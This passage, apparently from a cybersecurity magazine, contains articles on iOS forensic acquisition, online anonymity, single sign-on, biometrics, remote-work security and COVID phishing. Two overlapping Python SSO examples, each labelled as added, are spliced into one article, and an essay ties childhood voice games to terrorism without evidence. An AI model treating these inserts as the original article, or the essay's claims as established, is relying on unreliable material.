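    return (member.issym() or member.islnk()) and escapes(member.linkname)


def manifest_from_image(image: bytes) -> Tuple[Dict[str, str], List[str]]:
    """Walk the image once. Returns (path -> SHA-256 of content for regular files,
    list of member names rejected as unsafe). Nothing is written to disk."""
    manifest: Dict[str, str] = {}
    unsafe: List[str] = []
    with tarfile.open(fileobj=io.BytesIO(image), mode="r") as tar:
        for member in tar:
            if is_unsafe_member(member):
                unsafe.append(member.name)
                continue
            if not member.isfile():
                continue            # directories, device nodes, links: nothing to hash
            stream = tar.extractfile(member)
            digest = hashlib.sha256()
            for chunk in iter(lambda: stream.read(1 << 16), b""):
                digest.update(chunk)
            manifest[member.name] = digest.hexdigest()
    return manifest, unsafe


if __name__ == "__main__":
    image = build_constructed_image()
    print("image sha256:", image_digest(image))
    files, rejected = manifest_from_image(image)
    for path, digest in sorted(files.items()):
        print(digest, path)
    print("rejected entries:", rejected)
```

Record the whole-image digest together with the per-file manifest at acquisition time; since the agent is described as leaving only a few system-log records on the device, these digests are what later shows that the acquired content itself was not altered after the fact. The path check matters because forensic tools extract the archive with elevated rights, and an entry with an absolute path or a `..` component would otherwise be written outside the case folder.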



Conclusion

Jailbreak-free acquisition has numerous advantages over jailbreaks, and only two drawbacks. If your iOS device falls in the supported range of iOS 10.0 through 13.4.1, we strongly recommend sticking with the new, jailbreak-free acquisition method. If the iPhone you are analyzing is based on an unsupported platform, a compatible jailbreak may still be an option.

About the Author

Oleg Afonin is ElcomSoft’s security researcher and mobile forensic specialist. He is a frequent speaker at industry-known conferences such as CEIC, HTCIA, FT-Day, Techno Forensics and others. Oleg co-authored multiple publications on IT security and mobile forensics. With years of experience in the digital forensics and security domain, Oleg has led forensic training courses for law enforcement departments in multiple countries.

Oleg can be reached online at o.afonin@elcomsoft.com, https://twitter.com/elcomsoft or https://t.me/elcomsoft, and at our company website www.elcomsoft.com



How to Maintain Anonymity in Communications?

By Milica D. Djekic

Kids love to play games. They are attracted not only by computer games, but also by games that are creative, engaging and demand imagination. As they play, they imagine that they are fictional characters, and the whole game takes on a deep meaning for them. That is how children build up their personalities, psychology and minds. When they grow up, some of those habits remain with them. They may not express those sides of their personalities later, but they carry clear memories and subconscious drives from those experiences. We can never know what may trigger a certain kind of behavior in an adult unless we are familiar with their childhood and personal development. Some kids enjoy social games that develop their social intelligence and skills, while others choose the world of solitude, reading, writing or drawing. Both can give the prospective adult amazing creativity, and in our opinion it is important to find a balance between social and introspective skills. Parents raising their kids should know that the best practice is to let their offspring become what they want to be, but some supervision and advice is necessary in order to define the boundaries that young people can expect in their lives and social connections. A well-applied measure for forming someone’s character is the model of rewarding and punishing, and proper family education must take that sort of teaching into account.

One favorite game of many kids is making a phone call and talking to someone through a tissue. In such a game, they disguise their voice and become completely unrecognizable by speaking through some covering. They usually do so in company, for fun, to play jokes on the people on the line. Basically, everything starts as an innocent kids’ game, and things are under control as long as that behavior is just a way of playing. There are also children who make their voice unrecognizable in order to misrepresent themselves and invent a fully fictional story about anything. Some would say that their imagination can lead them far away, but the point is that if such behavior is not restricted at the start, it can cause serious trouble later on if that person does not quit such habits. In other words, those individuals could continue playing the “no one can see me” game and become a real concern to their surroundings. Any security professional would recognize that this is about someone with a deep need to hide their identity, and such habits can be adopted early in childhood. So, in order to prevent a new generation of troubled adults, the progress of children needs to be followed not only through schooling, but also through social activities. If strict questions are asked in psychological interviews and anyone reports such strange behavior, some teaching measures should be applied. Practically, the next step in such a development could be that such individuals figure out that the phone line with a disguised voice is no longer an interesting toy, so a move into cyberspace could work better.

The fact is that a computer with internet connectivity offers plenty of opportunities to remain hidden behind a profile or account. In addition, entire anonymity solutions have been developed that let you stay anonymous while still being able to share your story or content with many people. Indeed, these sorts of systems can be used for security purposes when you need to protect your identity and exchange vitally important information. So, the phone with the tissue is for kids; real hackers rely on sophisticated cyber infrastructure. From that point of view, it is only business, and many do it for the money, but there are still many unhealthy minds that choose victims for bullying or feed fake news to communities. The main concern with Darknet anonymity systems is that they are role-based and use quite strong encryption, so in inaccessible spots it is difficult to confirm the identity of the person sharing information. By places that are not easily approachable we have in mind the terrorist groups that take advantage of such well-developed systems and spread disinformation wherever they can. In other words, an innocent kids’ game could lead to a serious security concern, and from this perspective a Pandora’s box is opened, as many questions arise about the motives of those who commit such harsh crimes.

Even a kid can grasp how significant it is to appear as a trusted person, and may try to imitate an adult’s voice in order to trick or confuse someone. The situation is similar with the Darknet, as many of its users recognize the power of a trusted account, or at least of convincing someone that they are a trusted person. If anyone accepts that they are talking to a trusted individual, they may give information they normally would not, and the bad guys could use such a campaign to collect intelligence and find out something they could never obtain otherwise. Timing and accurate information can mean victory in a war, so it is of strategic significance to adopt measures and techniques to prevent, observe and respond to such and similar cases in practice.

Who Is on the Other Side of the Cord?

When carrying out anonymous operations, the bad guys go through an experience in which they believe something very important is happening. Possibly they developed those needs in childhood and carry very vivid inner experiences that motivate them to proceed with such activity. Their motto could be that no one will ever know who is on the other side of the cord, so from their point of view it appears quite exciting and interesting. The aim of terrorism is to spread fear and panic among community members, which is why someone with a vivid imagination would craft horrifying stories to intimidate a broad population. Probably that special effect, suggesting “I know you, but you do not know me!”, deeply motivates the bad guys to believe they have some sort of power over other people’s lives and security. It is quite dangerous to play those games in adulthood, so what is needed is to understand the motives of the persons doing so, because once the motive is defined the crime would stop.

Why Does Identity Matter?

It is not only terrorist and criminal organizations that hide their identity; many defense professionals choose to manage their identity carefully as a security and privacy measure applied to their tasks. In other words, it is not smart at all to go around sharing everything you know with everyone, as that could be a huge threat to someone’s life and business. The well-known Deep Web solutions were designed by the defense communities, but at the moment they are available to anyone, for more or less obvious reasons. Identity matters in any case, and once people are convinced that some account is trusted, they may share a lot of findings with such a profile. Modern history teaches us how hard life can be and why it is important to take some measures of protection.

The Deep Web systems can be used by media staff in order to bring a story to the audience. Practically, anyone sitting at a computer and writing to a journalist could get approved as an information source by some media group simply because they can offer content frequently. That is how public opinion could be created and managed, and in our belief that is a dangerous weapon that can compromise media professionalism. No ethical media house should trust just anyone, and before anything is published there should be several levels of confirmation. In other words, anyone looking for exclusives on Tor should know that they are possibly working for the wrong side of the law.

The Need to Hide Who You Are

Sometimes intelligence sources reporting to a defense agency need to hide their identity for security reasons. The agent on the other side of the communication has a clear picture of who is talking to him. Also, security organizations can confirm a lot of that, so it is quite clear they would be highly confident about the sources of the information. Being a source of findings for anyone credible is a heavy and time-consuming task, and it requires reliability, accuracy and skill to get approved for such a service. Apparently, the defense staff hide who they are as well, because it is not necessary to know any personal details of that person when the task is simply to provide helpful findings to the agency. How such an effort is further directed is not up to the informant; it is only up to that defense team.

The Anonymity Information Exchange Systems

The best-known privacy infrastructure worldwide is the Tor anonymity system, which serves millions of users every single day. From time to time the service gets shut down, but that is mostly a matter of the network’s configuration rules. Essentially, Tor offers good privacy and is mainly reliable for its users. It uses multi-level encryption, so it is quite tricky for anyone to challenge its security capacities. Let’s say Tor is a quite trusted system that attracts many professionals from many areas of interest. Apparently, it also has a dark side, being one of the biggest Darknet service providers in the world. It has become a real oasis for criminals, terrorists and hackers, as it offers a lot of benefits to users seeking to remain safe.



How Bad Guys Could Take Advantage of This

Maintaining anonymous communications can be a real challenge, and many people across the globe deal with that fact. In particular, the bad guys know how to take advantage of such an infrastructure, as they choose to stay invisible once the authorities come to get them. Some of their tactics show that they deal with many security and privacy accounts, and for that reason it can be difficult to track what they really do. Indeed, there are ways to figure some things out, but the majority of their activities stay well camouflaged from investigators and intelligence officers, as they use many accounts, many different locations and plenty of machines with their own web connectivity. In many cases, even identifying the threat is a challenge, as the entire search can be extremely time-consuming. Once the first bad actor is found, there are better chances of locating the rest of his network.

The Final Comments

As we said, kids love to play games, and adults may keep those habits later in life. Our story may begin quite innocently, but the impact of the behavior described could be enormous. In our understanding, it is time to start thinking about whether we want to make any progress as humankind. The best way to use your brain cells is to observe the simple things in your environment. Once you become aware of what is going on around you, you start correlating things with each other and discovering the rules behind those links. The task is hard, but, in our opinion, achievable!

About the Author

Milica D. Djekic is an Independent Researcher from Subotica, Republic of Serbia. She received her engineering background from the Faculty of Mechanical Engineering, University of Belgrade. She writes for domestic and overseas presses and is also the author of the book “The Internet of Things: Concept, Applications and Security”, published in 2017 by Lambert Academic Publishing. Milica is also a speaker on the BrightTALK expert’s channel. She has been a member of ASIS International since 2017 and a contributor to the Australian Cyber Security Magazine since 2018. Milica’s research efforts are recognized by the Computer Emergency Response Team for the European Union (CERT-EU), Censys Press and the EASA European Centre for Cybersecurity in Aviation (ECCSA). Her fields of interest are cyber defense, technology and business. Milica is a person with disability.



Everything You Want to Know About Single Sign-On

By Ayman Totounji, Founder, Cynexlink

Wikipedia defines single sign-on, or SSO, as “an authentication scheme that allows a user to log in with a single ID and password to any of several related, yet independent, software systems.”

Simply put, single sign-on is a session or user authentication service that allows a user to use a single set of login credentials (username and password) for multiple applications.

Or you can say that you can gain access to several applications with just one username and password.

This way, it simplifies password management for both businesses and individuals.

An example of an SSO login is Google’s products. For example, if you log into Gmail, you automatically get access to Google Drive, Google Photos, YouTube, and other Google services.



How it Works

Whenever you sign in to use an SSO service, the service creates an authentication token that records that you have been verified. This authentication token is a piece of digital information saved either in the user’s browser or on the SSO service’s servers, like a temporary ID card issued to you.

Any app that you access is authenticated through the SSO service. The SSO service passes the user’s authentication token to the app and the user is granted access. But a user will be required to sign in through the SSO service if they haven’t done so yet.

However, an SSO service does not necessarily keep a record of the user itself, since it does not store user identities. Most SSO services work by checking user credentials against a separate identity management service.

SSO just confirms whether your login credentials match your identity in the database, without looking after the database itself, just like a record-keeper who can access the records easily without having the entire catalog memorized.

I think these steps will help you understand better how single sign-on functions:

• The website first checks whether you have already been approved by the SSO solution, so that it can give you access to the site.

• If you haven’t, it redirects you to the SSO tool to log in.

• You are asked to enter your credentials.

• The SSO solution asks your identity provider or authentication system to confirm your identity.

• The SSO tool then passes the data to the website and takes you back to that site.

• After the sign-in process, the site verifies the authentication data with you as you move through the site, confirming that you are authenticated each time you open a new page.
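To make these steps concrete, here is an added example in Python that is not from the article or from any particular SSO product: an SSO service checks credentials against a constructed identity store, issues a signed token with an expiry and an audience list (the “temporary ID card”), and each application verifies that token on every request without ever holding the identity database. The signing key, the user “alice”, her password and the application names are demo assumptions.

```python
# Added example (not from the article or any SSO product): a minimal single sign-on flow.
# The SSO service checks credentials against a constructed identity store, mints a signed,
# time-limited token, and each application verifies that token on every request without
# holding the identity database. Key, user and app names are demo assumptions.
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Demo secret shared by the SSO service and the applications it fronts (constructed).
DEMO_SIGNING_KEY = b"demo-sso-signing-key-not-for-production"
DEMO_SALT = b"constructed-salt"


def password_digest(password: str) -> bytes:
    """Slow salted hash, so the identity store never holds plaintext passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), DEMO_SALT, 100_000)


# Constructed stand-in for the external identity provider / AD-LDAP directory.
IDENTITY_STORE = {"alice": password_digest("correct horse battery staple")}


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sso_login(username: str, password: str, now: Optional[float] = None,
              ttl: int = 300) -> Optional[str]:
    """Steps 3-4 of the flow: the SSO service checks the credentials with the identity
    provider and, on success, issues the 'temporary ID card' (a signed token).
    Returns None on bad credentials, so an unknown user and a wrong password look alike."""
    stored = IDENTITY_STORE.get(username)
    if stored is None or not hmac.compare_digest(stored, password_digest(password)):
        return None
    now = time.time() if now is None else now
    claims = {
        "sub": username,
        "iat": int(now),
        "exp": int(now) + ttl,               # short lifetime limits a stolen token's value
        "aud": ["mail", "drive", "photos"],  # applications this token may be shown to
    }
    body = b64url_encode(json.dumps(claims, sort_keys=True).encode())
    signature = hmac.new(DEMO_SIGNING_KEY, body.encode(), hashlib.sha256).digest()
    return f"{body}.{b64url_encode(signature)}"


def app_verify(token: str, app_name: str, now: Optional[float] = None) -> Optional[dict]:
    """Steps 1 and 6: an application checks the presented token on each page request.
    Returns the claims, or None when the app must redirect the user back to the SSO service."""
    try:
        body, signature = token.split(".")
        presented = b64url_decode(signature)
    except ValueError:                       # malformed token (binascii.Error is a ValueError)
        return None
    expected = hmac.new(DEMO_SIGNING_KEY, body.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, presented):
        return None                          # tampered claims or forged signature
    claims = json.loads(b64url_decode(body))
    now = time.time() if now is None else now
    if now >= claims["exp"]:
        return None                          # expired: sign in through SSO again
    if app_name not in claims["aud"]:
        return None                          # not issued for this application
    return claims


if __name__ == "__main__":
    token = sso_login("alice", "correct horse battery staple")
    print("mail accepts token:", app_verify(token, "mail") is not None)
    print("payroll accepts token:", app_verify(token, "payroll") is not None)
```

The token is a simplified stand-in for what real deployments carry as a SAML assertion or a signed JWT, but the checks each application performs are the same in spirit: signature, expiry and audience. The audience list is what keeps a token issued for one set of applications from being replayed against another, and the short expiry bounds how long a stolen token remains useful; both are mitigations for the single point of failure that the challenges section raises.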

What are the Benefits of Single Sign-On?

SSO lets users access all of their apps with a single username and password. Here I discuss some benefits of a single sign-on service.

Increasing Productivity:

SSO boosts productivity. When all of the apps are placed in one convenient portal, it accelerates access to the required systems and resources.

With SSO in place, a user needs to log in once and gets one-click access to all the apps they require. Although the amount of time saved might seem small, all of the time generally spent logging into individual resources adds up.

SSO also reduces the time users spend on password-related hassles, since only a single password is needed. And this makes a difference when you have to manage some 40 passwords, doesn’t it?



Therefore, users can focus on the important tasks rather than fiddling with multiple passwords.

Minimizing Risk Associated with Bad Password Habits:

Passwords cut both ways. While they protect your data, they can be used to steal all of it if they get into the hands of a threat actor. That’s why they are also described as a double-edged sword.

On top of that, most passwords are not easy to remember, and it is time-consuming to type them into each resource you need to get into. While changing your passwords is important, it just adds to the frustration for some users.

Enter SSO.

If you use SSO, you are less likely to write passwords down, reuse passwords, choose simple or commonly used passwords, or resort to other bad password practices.

Minimizing Helpdesk Costs:

Given that SSO minimizes the number of passwords in use, users are less likely to ask the IT department for password resets. This saves time and hassle, as resetting a simple password can eat up the helpdesk’s valuable time.

According to one study, 20-50% of all help desk requests are for password resets. Providing a single set of credentials to employees simply reduces this need.

Improving Security Efficiencies:

From the security viewpoint, it is quite natural to be bothered by the use of the same password for all the apps. What if your master password is stolen?

Yes, keeping one password can make your systems vulnerable.

And it is equally true that SSO can minimize password theft if used carefully.

This is because users only need to remember a single password for many apps, meaning that they can focus on making that single password secure and strong.

Plus, they are less likely to write it down, unlike multiple passwords that have to be noted down. This way, it minimizes the risk of password theft.



Understanding the Types of Single Sign-On

• ENTERPRISE SINGLE SIGN-ON is considered a primary authentication: it intercepts login requests when required by secondary applications and completes the user and password fields. This lets one system interact with other systems, which might disable their own login screens.

• WEB SINGLE SIGN-ON, or WEB SSO, works with applications that can be accessed online, and verifies a user on multiple applications by eliminating the need to be identified again. A proxy server intercepts the access data and facilitates the communication, transferring the results to the computer that requested them. Unidentified users are sent to an authentication service, which returns a successful login.

• FEDERATED IDENTITY relies on an identity management solution that uses standards to let applications identify clients without having them go through the authentication process again and again.

• OPENID is a decentralized SSO procedure in which user IDs are stored at a URL that any server can verify.

What Are the Challenges Associated with Single Sign-On?

• More robust passwords should be created. If an SSO account is hacked, every other account under the same authentication is exposed to the attack.

• A breakdown of SSO at one site can affect all the linked sites. Therefore, it is important to choose the right SSO system: it should be reliable and equipped with plans to deal with interruptions.

• Your SSO is affected by any problem in your identity provider. The provider's weakness during any kind of interruption becomes your problem as well, and it may be beyond your control. Again, you need to work with an efficient vendor.

• If a threat actor gets into your identity provider user account, all your linked systems become vulnerable. This is a classic single point of failure and should be addressed in the planning process. An efficient SSO provider ensures top-notch security.

• It is not easy to set up SSO because of the different environments involved.

• SSO is not recommended for multi-user computers. It causes sheer inconvenience and security issues if other users use a machine that still has someone else's accounts logged in.



• Some SSO vendors can provide their data to third parties.
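The federation mechanics behind the types listed above, and the linked-system exposure listed among the challenges, can be seen in a small signed-assertion exchange. This is an added example, not code from the article or from Cynexlink: a toy HMAC token stands in for a SAML or OpenID Connect assertion, and the issuer name, shared secret, application audiences and user are constructed.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed values for the demo (hypothetical; a real federation signs with
# the IdP's private key and follows a standard such as SAML or OpenID Connect).
IDP_ISSUER = "https://idp.example.test"
IDP_SECRET = b"constructed-demo-secret-do-not-reuse"
PAYROLL_APP = "https://payroll.example.test"
HR_APP = "https://hr.example.test"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_assertion(subject: str, audience: str, lifetime_s: int = 300, now=None) -> str:
    """Identity-provider side: after the one interactive login, hand the user a
    short-lived assertion bound to exactly one application (the audience)."""
    now = int(time.time()) if now is None else int(now)
    claims = {"iss": IDP_ISSUER, "sub": subject, "aud": audience,
              "iat": now, "exp": now + lifetime_s}
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(IDP_SECRET, body.encode(), hashlib.sha256).digest()
    return body + "." + _b64(sig)


def verify_assertion(token: str, expected_audience: str, now=None):
    """Service-provider side: admit the user without a second login only if the
    assertion is authentic, from the trusted issuer, meant for this application
    and still valid. Returns (subject, "ok") or (None, reason)."""
    now = time.time() if now is None else now
    parts = token.split(".")
    if len(parts) != 2:
        return None, "malformed"
    body, sig = parts
    try:
        given = _unb64(sig)
    except ValueError:
        return None, "malformed"
    expected = hmac.new(IDP_SECRET, body.encode(), hashlib.sha256).digest()
    # Check the signature first, in constant time, so nothing below trusts
    # unverified input.
    if not hmac.compare_digest(expected, given):
        return None, "bad signature"
    claims = json.loads(_unb64(body))
    if claims.get("iss") != IDP_ISSUER:
        return None, "unknown issuer"
    # Audience binding: an assertion for payroll must not open HR, which limits
    # the blast radius if one assertion leaks.
    if claims.get("aud") != expected_audience:
        return None, "wrong audience"
    # A short lifetime limits replay of a stolen assertion.
    if now >= claims.get("exp", 0):
        return None, "expired"
    return claims["sub"], "ok"


if __name__ == "__main__":
    t0 = 1_000_000
    token = issue_assertion("alice", PAYROLL_APP, now=t0)
    print(verify_assertion(token, PAYROLL_APP, now=t0 + 60))   # ('alice', 'ok')
    print(verify_assertion(token, HR_APP, now=t0 + 60))        # (None, 'wrong audience')
    print(verify_assertion(token, PAYROLL_APP, now=t0 + 400))  # (None, 'expired')
```

The audience and expiry checks are what keep a compromised or leaked assertion from opening every linked application at once; the issuer check is why the identity provider itself remains the single point of failure the list describes.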

How to Choose a Single Sign-On Solution

There are some key factors to consider when choosing a Single Sign-On solution.

Personalized User Experience:

Check whether the vendor lets you customize the login page to your corporate branding. After all, an efficient single sign-on process doesn't confine users to a box where everything looks alike.

Access to All the Apps You Require:

Make sure your sign-on vendor lets you use all the apps you require.

Security:

Security is a crucial point to look for in a vendor. Make sure they protect your passwords and let you integrate with AD/LDAP for quick access to your data. Reliability is also key, as breakdowns are often associated with these services. Therefore, make sure to work with a vendor who ensures nearly 100% uptime so that your team can access their apps when they need them.

Scalability:

SSO solutions should grow with your organization. There is no point in changing vendors every now and then just because they are too big or too small for your needs.

Bottom Line:

So, you now understand the important things about SSO. It is a great solution to one big problem: how to manage the increasing number of users across a big ecosystem of apps and services. After all, it is not easy to memorize complex passwords as we use more and more systems in our daily lives.

It lets us log in to different applications and services with a single identity. It eliminates the need to re-enter credentials for each account every time you disconnect from a service.

However, an SSO service is not immune to issues such as breakdowns and compromised passwords. Luckily, these can be avoided by using strong passwords and working with an efficient SSO vendor.



About the Author

Ayman is the founder of Cynexlink. When Ayman founded Cynexlink, he had one core mission in mind: helping small- and mid-sized companies spend more time focusing on their core businesses. Could we impress you with his technical background? With his engineering degree from Damascus University, as a CCNP, CCVP, CCNA, CCDA, Cisco IPTX and VoIP specialist, being MCSE and A+ certified and having nearly 20 years of experience in enterprise network design and architecture, network routing, switching, wireless, security, Cisco Unified messaging, CCME, UC500 Series, voice gateway and Cisco Unity – yes, we think we could.

Ayman can be reached online at aat@cynexlink.com and at our company website https://www.cynexlink.com

LinkedIn | Twitter | 949.668.0682



A Passwordless Future: Will Biometric Identification

Replace Passwords?

By Joshua Frisby, Founder of PasswordManagers.co

From Face ID to scanning your fingerprint to unlock your phone, biometric authentication is woven into almost every device that we rely on. It has been so seamlessly integrated that it has become somewhat second nature in the digitally dominant world that we live in.

While not needing to enter, or remember, a password is extremely convenient, we must ask: Will biometric authentication replace traditional passwords altogether? And most importantly: Is it safe?

We have become so accustomed to using biometric authentication, but the truth is that while biometrics offer many advantages, they also come with several drawbacks. Let’s take a closer look.

Is There a Need to Replace Passwords?

Login details and credentials are susceptible to theft and are often targeted by hackers. In fact, Verizon’s Data Breach Investigations Report concluded that up to 81% of data breaches are due to hackers being able to gain access by leveraging weak, reused, or stolen passwords. With the level of exposure to cybercrime dependent on where you reside, having a fool-proof method to log in to your accounts is crucial to secure digital infrastructures, devices, and identities.



According to research conducted by LastPass, the average person can have up to 97 work-related passwords that they need to manage, and that’s not even including personal ones. It’s no shock that so many people reuse the same password; after all, we are only human. Unless you are a genius with the world’s best memory, it’s highly unlikely that you are going to be able to remember so many, let alone come up with complex combinations to ensure you use unique, strong passwords for each account.

With cybercrime on the rise, 55% of people would prefer a method of protecting accounts that doesn’t involve passwords. Enter biometric authentication.

What Makes Biometrics a Good Alternative?

Biometric data is unique to you, making it hard to steal and imitate. And so, biometrics are a serious

contender for replacing passwords as the standard login method.

Not only are we familiar with using our biometric data (face and fingerprint) to unlock our devices and in

some cases, a handful of accounts, they also make the login process effortless. There is no need to type

usernames or long complicated passwords. Take mobile banking apps as an example, what could be

more convenient than simply scanning your finger on a reader to see your account balance? Or, even

simpler, look at your phone’s camera to unlock your device via the built-in iris scanner.

Source: Science Focus

While convenience is nice to have, security is the primary concern. Because biometrics are more difficult

to replicate than passwords, hackers cannot obtain your sensitive data with a simple phishing attack.

This makes hacking data that is protected with biometrics much more difficult than password-protected

data.



We’ve touched on face-scanning but it is far more sophisticated than you may think. Facial recognition is

rapidly gaining popularity and the algorithms that are used to analyze someone’s facial features are also

becoming increasingly intelligent. For example, some facial recognition applications can differentiate a

live subject from a picture, making it very difficult to spoof the facial recognition and gain unauthorized

access to protected data.

Capital is another driving force behind the development of biometrics. The biometrics market is estimated

to be worth a staggering $49 billion by 2022 and huge investments are being made in the development

of new algorithms and systems to improve biometric accuracy.

Biometric authentication was first introduced to the mass market by smartphones such as the Apple

iPhone and Samsung’s Galaxy range. Today, it is possible to use biometrics across a much broader

range of applications. However, biometrics are not limited to devices and software, we can also use them

to access physical spaces like our homes. This versatility makes for a better overall authentication

method than passwords, especially when speed, ease of login, and security are all concerns.

If biometrics are a better authentication method, why are we still using passwords? The answer is that

biometrics are not perfect and they do have significant drawbacks that need to be addressed before we

can fully embrace the passwordless revolution. While the technology is very promising and convenient,

there’s certainly room for improvement before biometrics can claim to enjoy the same popularity that

passwords do.

What Are the Drawbacks of Biometric Authentication?

While biometrics are very secure, they are also immutable.

It is important to remember that biometric data has to be stored somewhere for applications to use it as

an authentication method. The problem is that if these databases were to be hacked, your identity could

become compromised.

If your biometric data is ever compromised in one way or another, you could face serious repercussions.

You can change passwords, you can’t change biometrics.

Since biometrics can’t be changed, it would be impossible to ensure the safety of compromised accounts

once hacked. This is where passwords have the upper hand. If your password is ever lost or stolen, you

can simply log in to your account and change your credentials to make it secure again. This process can

be repeated over and over again.

Biometric authentication also comes with quite a few privacy concerns. Since biometrics inextricably link

a user’s digital and physical identity, there are concerns that biometric data could be collected and abused

by hackers. Since data privacy is a key concern, this could cap how widely biometric authentication is

accepted as more people become aware of the potential downsides.



Source: Apple Insider

It is also important to note that biometric authentication systems have not been around as long as

password-based systems. Consequently, they suffer from more bugs and growing pains. False positives

or negatives occur frequently, and this can lead to frustration when an authorized user is denied access

or, more seriously, when the wrong person is granted access due to a false positive identification. A

research team from New York University created an artificial intelligence platform that was able to

successfully recreate full fingerprints from partial prints. The recreated fingerprints were able to fool a

biometric authentication system 20% of the time.

Last but not least, biometric authentication systems can often be biased against users who cannot easily

submit biometrics. This includes handicapped people who may have experienced a change in their

biometric details due to an injury. For example, a badly cut finger may lead to scarring that makes a

fingerprint unrecognizable, and as a result, revokes access.

Passwords Are Here to Stay

Although the use of passwordless methods is on the rise, it seems that passwords will remain the mainstream authentication method for the near future. So, to make using passwords as simple and secure as possible, there are a few simple steps you can take.



The key to having optimal online security is to ensure that all your passwords are unique and complex.

It’s easy to base your passwords on something that is of personal significance to you such as your

birthday or the name of a loved one, but this makes passwords easy to guess and is a hacker’s dream.

Using a password generator to create complex passwords that cannot be guessed with ease is a simple

and quick way to strengthen the security of your online accounts. But, to take the security of your

passwords to the next level, you can store them in a fortified password vault cocooned in encryption.

There’s a wide range of different password managers that can facilitate the secure storage of passwords

whilst also offering the convenience of auto-filling credentials, making logging into sites as seamless as

biometric authentication.

You should also ensure that you never write down your passwords, save them in spreadsheets, or share them over text or email. Hackers can easily exploit these insecure methods. Changing passwords frequently also makes your accounts more secure and helps to keep hackers at bay.

Although biometric authentication doesn’t appear to be replacing passwords in the near future, perhaps

the best authentication method is a hybrid one in which passwords and biometrics co-exist to deliver a

comprehensive security solution.

About the Author

Joshua Frisby is the Founder of PasswordManagers.co. His mission

is to help you protect your passwords. Whether you want to securely

manage passwords for personal, family, or business use,

PasswordManagers.co is here to help you stay safe. Josh can be

reached via email or LinkedIn.



Post COVID-19: Cloud, Remote Work and BYOD Security

Predictions

By Anurag Kahol, CTO and co-founder, Bitglass

Cloud adoption has already been growing rapidly, but we’ll see a sharp increase in adoption in

2020 as a result of the global pandemic.

Recent events have impacted businesses and schools all around the world, causing them to shift to

remote work wherever possible. Cloud adoption gives employees and students the freedom to operate

from the safety of their homes by granting remote access to needed data and services. However, even

before the outbreak, cloud adoption was outpacing the adoption of the tools needed to properly protect

data in cloud environments. In 2019, 86% of organizations deployed cloud-based tools, but a mere 34%

made use of single sign-on (SSO), a basic but critical capability for authenticating users and securing

access to corporate cloud environments. This statistic suggests deeper underlying cloud security issues

within organizations and indicates that data breaches will continue to arise around the world.

The shift to widespread remote work also increases the likelihood of insider threats.

Verizon’s 2019 Data Breach Investigation Report found that approximately 34% of breaches involved

internal actors. Additionally, a recent survey conducted on IT professionals about insider threats revealed

that only half of organizations provide user training regarding insider threats. While protecting data from

malicious external actors is typically top of mind for most organizations, the fact remains that they must

also defend against employees--whether they are malicious or merely careless.



Phishing attacks are not a groundbreaking threat, and general employee awareness of these schemes

has grown in recent years; however, hackers still find success with this tactic by taking advantage of

major news. In fact, the United Nations' health agency released an alert warning of an increased number

of cybercriminals posing as World Health Organization (WHO) representatives amid the current

pandemic. During this stressful time, recipients of these messages are more likely to click on malicious

URLs, open attachments, and give up personal data. Because of this, insider threats will spike and be a

leading cause of data breaches in 2020.

Businesses will implement changes to ensure BYOD devices are secure.

A majority of organizations (85%) were already somewhat prepared for remote work by enabling bring

your own device (BYOD) policies. On the flipside, not all companies that have adopted BYOD are doing

so securely. For example, 43% of businesses do not know if the devices employees are using to access

corporate data are infected with malware--demonstrating a disturbing lack of visibility. By the end of 2020,

we will likely see even higher BYOD adoption rates--whether out of necessity for enabling remote work,

or simply for BYOD’s many benefits, including enhanced mobility, efficiency, and employee satisfaction.

Regardless, when companies enable BYOD, they must also implement agentless security measures that

can protect corporate data on personal devices. With agentless tools, IT gains security and compliance

without invading user privacy through agents on employees’ personal endpoints. As organizations

increasingly realize that cybersecurity must be a top priority, we predict that the use of agentless security

solutions will rise alongside that of BYOD.

About the Author

Anurag is the CTO and co-founder of Bitglass where he

expedites the company’s technology direction and

architecture. Anurag was director of engineering in Juniper

Networks’ Security Business Unit before co-founding Bitglass.

Anurag received a global education, earning an M.S. in

computer science from Colorado State University, and a B.S.

in computer science from the Motilal Nehru National Institute

Of Technology.



The Rise of COVID-19 Phishing Attacks: How Cyber

Adversaries Are Adopting Phishing to Generate New

Threat Vectors

By Brad Slavin, CEO of DuoCircle LLC

While COVID-19 has locked all people in their homes, with office premises closed, cyber adversaries

seem to have a field day using the pandemic as a launchpad for phishing attacks. Organizations and

individuals must be aware of the detective, preventive, and protective measures to safeguard their

information assets against these attacks.

As the COVID-19 pandemic assumes global proportions, it is natural for people to become anxious.

People naturally turn to the internet to acquire the latest information on the coronavirus related drugs,

vaccines, etc. At the same time, social engineering attacks have been on the rise as malicious actors

worldwide keep developing sophisticated tools and techniques to entice employees as well as individuals

to reveal sensitive and confidential information, such as personally identifiable information (PII), financial

data, or user account credentials. Let's dive deep into the gravity of the situation before discussing what

the best anti-phishing solutions and techniques are that organizations and individuals can make use of.

Some Hard Facts and Statistics on Phishing Attacks Based On COVID-19

Researchers reveal that cybercriminals are primarily employing three ingenious phishing attack

methodologies to target victims. They are brand impersonation, scamming, and business email

compromise (BEC). Here are a few spine-chilling statistics on COVID-19 phishing scams that have made

headlines around the world.



• There has been an unprecedented rise in phishing scams with more than 854,000 confirmed

phishing and counterfeit web-pages reported in Q1 of 2020. Besides, more than 4 million pages

fall in the category of suspicious pages.

• The alarming issue is that nearly 30% of these confirmed phishing pages (approximately more

than a quarter of a million) pertain to COVID-19 alone.

• Though the first COVID-19 related phishing scam surfaced by the end of January 2020, the figure

for March 2020 alone is 9,116, a 667% increase over February 2020.

• Eighteen million malware and phishing emails and more than 240 million COVID-19-related spam

email messages are sent over Gmail daily.

• Citizens in the US have lost somewhere around $12 million to coronavirus phishing attacks. And

in the UK, it's over £2 million.

Healthcare - The Most Vulnerable Industry Domain to Phishing Attacks

COVID-19 has kept the entire world on tenterhooks. The FUD (the fear, uncertainty, and doubt) and the

